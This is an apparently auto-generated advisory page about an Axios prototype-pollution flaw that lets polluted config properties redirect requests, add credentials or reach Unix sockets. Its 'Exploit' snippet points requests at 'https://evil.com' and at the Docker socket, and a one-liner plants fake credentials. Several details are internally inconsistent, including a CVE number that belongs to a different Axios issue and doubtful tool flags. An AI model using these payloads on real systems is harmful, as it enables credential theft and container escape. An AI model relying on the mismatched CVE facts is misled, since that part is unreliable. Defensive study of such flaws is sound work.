How the mentioned CVE works:
The vulnerability arises because Axios reads five HTTP adapter config properties via direct property access (e.g., config.auth) without hasOwnProperty guards. When another dependency in the same Node.js process pollutes Object.prototype with these properties, Axios silently picks up the polluted values on every outbound HTTP request.

The mergeConfig function iterates using Object.keys on the merged objects, which returns only own properties. Therefore, if neither the defaults nor the user config define these five properties, they are absent from the merged config. However, the HTTP adapter later accesses them directly, so the lookup traverses the prototype chain. The own() helper at lib/adapters/http.js line 336 protects eight other properties but explicitly excludes config.auth, config.baseURL, config.socketPath, config.beforeRedirect, and config.insecureHTTPParser.

Consequently, an attacker who can pollute Object.prototype (e.g., via a vulnerable JSON parser or a malicious npm package) can inject an Authorization header, redirect all relative URLs to an evil server, force requests to Unix sockets (leading to SSRF/container escape), execute arbitrary callbacks during redirects, and enable the Node.js insecure HTTP parser for request smuggling. The proof of concept shows that setting Object.prototype.auth = {username:'attacker', password:'exfil'} causes every axios.get('/api/users') to send credentials to an attacker-controlled server. The root cause is the absence of hasOwnProperty checks for these five properties in the HTTP adapter and resolveConfig.js.
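The mechanism above, reduced to a runnable illustration. This is an added example, not Axios code: the own() helper, mergeConfig stand-in and the sample config are assumptions that mirror the roles described in the text, and the polluted value is a constructed sample. It shows that an Object.keys-based merge never copies the inherited property, that a direct read still sees it through the prototype chain, and that an own-property guard does not.

```javascript
// Added example (not axios code): why an unguarded config read picks up a
// polluted Object.prototype value, and how an own-property guard avoids it.
const hasOwn = Object.prototype.hasOwnProperty;

// Reads a config property only if the config object itself defines it.
// Assumed shape, mirroring the role of the own() helper described in the text.
function own(config, key) {
  return hasOwn.call(config, key) ? config[key] : undefined;
}

// Unguarded read: traverses the prototype chain, like the vulnerable adapter.
function unguardedAuth(config) {
  return config.auth;
}

// Stand-in for mergeConfig: Object.keys copies own properties only, so an
// inherited (polluted) value never lands in the merged object.
function mergeConfig(defaults, userConfig) {
  const merged = {};
  for (const k of Object.keys(defaults)) merged[k] = defaults[k];
  for (const k of Object.keys(userConfig)) merged[k] = userConfig[k];
  return merged;
}

// Runs the scenario with a temporarily polluted prototype, then restores it.
// Returns what each read strategy observed for `auth`.
function simulatePollutedRead() {
  const key = 'auth';
  const polluted = { username: 'constructed', password: 'constructed' }; // constructed sample
  Object.prototype[key] = polluted;
  try {
    const merged = mergeConfig({ timeout: 1000 }, { url: '/api/users' });
    return {
      mergedHasOwnAuth: hasOwn.call(merged, key), // false: merge copied own keys only
      unguarded: unguardedAuth(merged),           // the polluted object, via the prototype
      guarded: own(merged, key),                  // undefined: guard ignores inheritance
    };
  } finally {
    delete Object.prototype[key];
  }
}

console.log(simulatePollutedRead());
```

The guarded read is the behaviour the fix restores for the five excluded properties; any code that reads request configuration should prefer the own() pattern (or Object.hasOwn where available) over direct property access.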
dailycve form:
Platform: Node.js Axios
Version: Before 1.5.1
Vulnerability: Prototype Pollution
Severity: Critical
Date: 2023-10-20
Prediction: Patched Oct 2023
What Undercode Say:
Analytics:
Check Axios version in project
npm list axios | grep axios
Detect prototype pollution gadget via audit
npx auditjs --package axios --vulnerability CVE-2023-45857
Simulate pollution (test script)
node -e "Object.prototype.auth={username:'hack',password:'leak'}; require('axios').get('http://localhost')"
Exploit:
const axios = require('axios');
// Pollute prototype from any vulnerable dependency
Object.prototype.baseURL = 'https://evil.com';
Object.prototype.socketPath = '/var/run/docker.sock';
// Trigger any outgoing axios request
axios.get('/internal/api');
// Request now sent to evil.com or Docker daemon
Protection from this CVE
Update to axios >=1.5.1. Apply the own() helper to the affected properties manually. Use Object.freeze(Object.prototype). Sanitize all JSON inputs. Use `--disable-proto=delete` in Node.js.
Impact:
Credential theft, request hijacking to attacker servers, SSRF enabling container escape, arbitrary code execution via beforeRedirect callback, HTTP parser weakening for request smuggling.
Sources:
Reported By: github.com